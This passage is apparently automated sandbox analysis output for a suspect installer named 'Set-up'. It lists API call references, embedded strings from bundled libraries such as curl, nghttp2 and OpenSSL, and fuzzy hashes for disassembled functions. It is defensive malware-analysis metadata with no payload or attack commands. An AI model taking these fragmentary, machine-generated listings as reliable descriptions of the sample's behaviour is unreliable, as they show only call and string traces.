                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: free$abortmallocstrlen
                          • String ID: $ $ $Memory allocation failed for decrypted data.
                          • API String ID: 673139954-1317699236
                          • Opcode ID: a6e7fe35b162fbe35d0347aa0023c91964c7d8050ee60f1e0d80fb4c5db273f8
                          • Instruction ID: d3260b09c22dafbabd9e0edd3803e8f7691648474f509dab8cacd5de78ee2741
                          • Opcode Fuzzy Hash: a6e7fe35b162fbe35d0347aa0023c91964c7d8050ee60f1e0d80fb4c5db273f8
                          • Instruction Fuzzy Hash: 835192B4904719DFCB00EFA9C48599EBBF1FF88310F108959E8989B325E774D9448F92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: 127.0.0.1$::1$Illegal STS header skipped$Set-Cookie:$Strict-Transport-Security:$localhost
                          • API String ID: 0-629096778
                          • Opcode ID: d0f1fbde9cab61d33c970c0b78da903f0cbc54dbc008be55e1da968ead9705ac
                          • Instruction ID: cc3051d2e32ac68c33ff7e2ed7a6f25676ce9b790732c8bdf55d902abf4c2878
                          • Opcode Fuzzy Hash: d0f1fbde9cab61d33c970c0b78da903f0cbc54dbc008be55e1da968ead9705ac
                          • Instruction Fuzzy Hash: 1D414971B043016BE7218A25DC86FA77BA9BF42344F0C8175FD4C9A183EB39E855C7A5
                          APIs
                            • Part of subcall function 0003D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,000301B1), ref: 0003D8E2
                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,0006420E,?,?), ref: 00036350
                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(0006420E,?,?,?,?,?,?,?,?,?,0006420E,?,?), ref: 0003635B
                          • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00036369
                          • Sleep.KERNEL32(00000001), ref: 000363B2
                          • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 000363BC
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0006420E,?,?), ref: 000363C7
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0006420E,?,?), ref: 000363D6
                            • Part of subcall function 0003D8C0: GetTickCount.KERNEL32 ref: 0003D968
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000363ED
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: free$FileMove_strdup$CountCounterPerformanceQuerySleepTick
                          • String ID:
                          • API String ID: 1793959362-0
                          • Opcode ID: 0eeee4172002702dbeda2d1f237c354a78cec1d2368057991e4c5a71900b1a10
                          • Instruction ID: 4333629094e7ea615ce25ab3a39f9ae9650df37f18f8fbc5cdcc902f95190c8e
                          • Opcode Fuzzy Hash: 0eeee4172002702dbeda2d1f237c354a78cec1d2368057991e4c5a71900b1a10
                          • Instruction Fuzzy Hash: 2111D5A2D0064467E7136724AC42BBF736DDF95768F094225FC4857242FF22EB9582A3
                          APIs
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A,?), ref: 00078290
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00078313
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memchrstrlen
                          • String ID: HTTP/$Invalid status line$RTSP/$Received HTTP/0.9 when not allowed
                          • API String ID: 1715104208-1496966621
                          • Opcode ID: f30845e0c979aa8228a2c48cae3cda0988a90a96157226d40ae0e9826a55efb9
                          • Instruction ID: a7c934e90613bae31889e64ae4b05c6c8235489d21a3e59400b513acaeb8de1d
                          • Opcode Fuzzy Hash: f30845e0c979aa8228a2c48cae3cda0988a90a96157226d40ae0e9826a55efb9
                          • Instruction Fuzzy Hash: B8B1E4B1E443416BD760AA249889BAB77D8AF51314F04C43CFD8D97243EFB9ED0487A6
                          APIs
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0010E209
                            • Part of subcall function 00104620: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000004,?,?,00000000,?,00111478,?,?,?), ref: 00104643
                          Strings
                          • SFTP unlink packet too short, xrefs: 0010E35A
                          • Unable to send FXP_REMOVE command, xrefs: 0010E36B
                          • SFTP Protocol Error, xrefs: 0010E3AA
                          • Unable to allocate memory for FXP_REMOVE packet, xrefs: 0010E374
                          • Error waiting for FXP STATUS, xrefs: 0010E3BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _time64memcpy
                          • String ID: Error waiting for FXP STATUS$SFTP Protocol Error$SFTP unlink packet too short$Unable to allocate memory for FXP_REMOVE packet$Unable to send FXP_REMOVE command
                          • API String ID: 1622878224-2749593575
                          • Opcode ID: 0a8e878367d6069d483ea88c735a9ca8ddfa497ad74043d934fdb6153958b22c
                          • Instruction ID: 59b2d6b30fe603a722c96ff30129f0b99862a9b24a43741f97b158c07939ba7b
                          • Opcode Fuzzy Hash: 0a8e878367d6069d483ea88c735a9ca8ddfa497ad74043d934fdb6153958b22c
                          • Instruction Fuzzy Hash: 2B5190B1908300ABD7209F25DC45B6BBBE4BF51714F044D2DF9D99B2D2E7B1E8048B62
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: nghttp2_session.c$stream->queued == 1$urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS
                          • API String ID: 0-1712496329
                          • Opcode ID: 09398e0f86b287f3906302538d90cc997b4fd6447dc48d9ddb0c1c6634cc192c
                          • Instruction ID: d7ee335408591aab02bf11051a319546c80937b825793dbe9b0241df50b79e1d
                          • Opcode Fuzzy Hash: 09398e0f86b287f3906302538d90cc997b4fd6447dc48d9ddb0c1c6634cc192c
                          • Instruction Fuzzy Hash: 84415B70700A002BFB6586B9DC59FF677D4AF02302F0D456CF95ADA093EB54EA50C761
                          APIs
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0002623A
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0002624D
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0002627C
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00026389
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$_time64memcpy
                          • String ID: .$hsts.c
                          • API String ID: 2198566249-2242870694
                          • Opcode ID: 1d3dfe74f3a55d41996a2b9b37f4b3a7a9285a5025684e610a31538beaf65fec
                          • Instruction ID: 703225e708e036db2108432ea1473e74a822ab1fb42e023106b02870877198a7
                          • Opcode Fuzzy Hash: 1d3dfe74f3a55d41996a2b9b37f4b3a7a9285a5025684e610a31538beaf65fec
                          • Instruction Fuzzy Hash: 7041ACF6D083645BEF21AE60BC46BDB7AD89F14314F080438FD4E96283F57699288692
                          APIs
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0000002E), ref: 003A447B
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000042), ref: 003A44C4
                          • WSAStringToAddressW.WS2_32(?,00000002,00000000,?,00000010), ref: 003A44E3
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(0000002E), ref: 003A4500
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 003A450B
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0000002E), ref: 003A451F
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 003A4546
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$strcmp$AddressByteCharMultiStringWide
                          • String ID:
                          • API String ID: 389649969-0
                          • Opcode ID: 36c4ce0f72e658b355c518bea29e36d9a5936cfd229770f89e6d1cae47b771e1
                          • Instruction ID: 103226351e3282cab40e8a3ae225f5f84557550a5b6c0e2c9094ff165ca8b0bd
                          • Opcode Fuzzy Hash: 36c4ce0f72e658b355c518bea29e36d9a5936cfd229770f89e6d1cae47b771e1
                          • Instruction Fuzzy Hash: F23125B2E043056BEB21AB249D01BBB778CDBD3354F054628F84896181EBB8AD848362
                          APIs
                            • Part of subcall function 003A7850: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,003A66E9,?,?,?,?,?,?,?,?,?,?,?), ref: 003A787B
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,UTF-8,00000001,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 003A66F5
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 003A6714
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 003A6727
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003A6776
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003A67CC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _errno$strcmp
                          • String ID: @YP
                          • API String ID: 3909137471-2412372795
                          • Opcode ID: c9d65689eb43c4a24416252920877440ab2c151c399e7889274885ebb89d32c3
                          • Instruction ID: 04ba1542891c1635693bffc9591b37762f1c3ba7445301007c9ea2a84a2ba6e1
                          • Opcode Fuzzy Hash: c9d65689eb43c4a24416252920877440ab2c151c399e7889274885ebb89d32c3
                          • Instruction Fuzzy Hash: E03185796002019FDB125FA4DC45A2A77E9EF9A328F490528F99C9B212E732DD11CB51
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0023E16C
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0023E17B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen
                          • String ID: $ for$:$Ente$crypto/ui/ui_lib.c
                          • API String ID: 39653677-4294831502
                          • Opcode ID: f3d6f87a1f790ff4be9ece4ae1b23ad3b24469129c326c8e8a08ffaa6ecf39a1
                          • Instruction ID: d6515812add0ca8cfd5560216f722330fb4beccba5243068021b735f11ae3d75
                          • Opcode Fuzzy Hash: f3d6f87a1f790ff4be9ece4ae1b23ad3b24469129c326c8e8a08ffaa6ecf39a1
                          • Instruction Fuzzy Hash: 5221C8F2A04315BBDA106E55AC42D6B77ECEDA1394F0A4439FD4C86242F771CD29C6A3
                          APIs
                          • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,0025F763,?,?,?,?,?), ref: 00262251
                          • WideCharToMultiByte.KERNEL32 ref: 00262284
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 002622BD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$wcslen
                          • String ID: ERR_CAPI_error$engines/e_capi.c$engines/e_capi_err.c
                          • API String ID: 1062461220-336193293
                          • Opcode ID: f8184d7ec973aa177c5dbdec39d2bad04958a1460b5ee34f3d67836000f68ef6
                          • Instruction ID: 74a63547b3a830a2fef65101e2801859771774740669e42d3d6da987da3820ab
                          • Opcode Fuzzy Hash: f8184d7ec973aa177c5dbdec39d2bad04958a1460b5ee34f3d67836000f68ef6
                          • Instruction Fuzzy Hash: 6521F7B1E54705AAF3302B61AC46B3B36599B50714F054179F908563C2EBF849A8C7D2
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,0017A9CE,000000D2), ref: 001D83A3
                          • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0017A9CE), ref: 001D83C6
                            • Part of subcall function 001D60E0: GetLastError.KERNEL32(001D7CCC,?,00000000,001D7127,001D7CCC,00000000,001FCAB7,00021A70), ref: 001D60E3
                            • Part of subcall function 001D60E0: SetLastError.KERNEL32(00000000), ref: 001D61A5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLast$strcpystrlen
                          • String ID: crypto/err/err_local.h
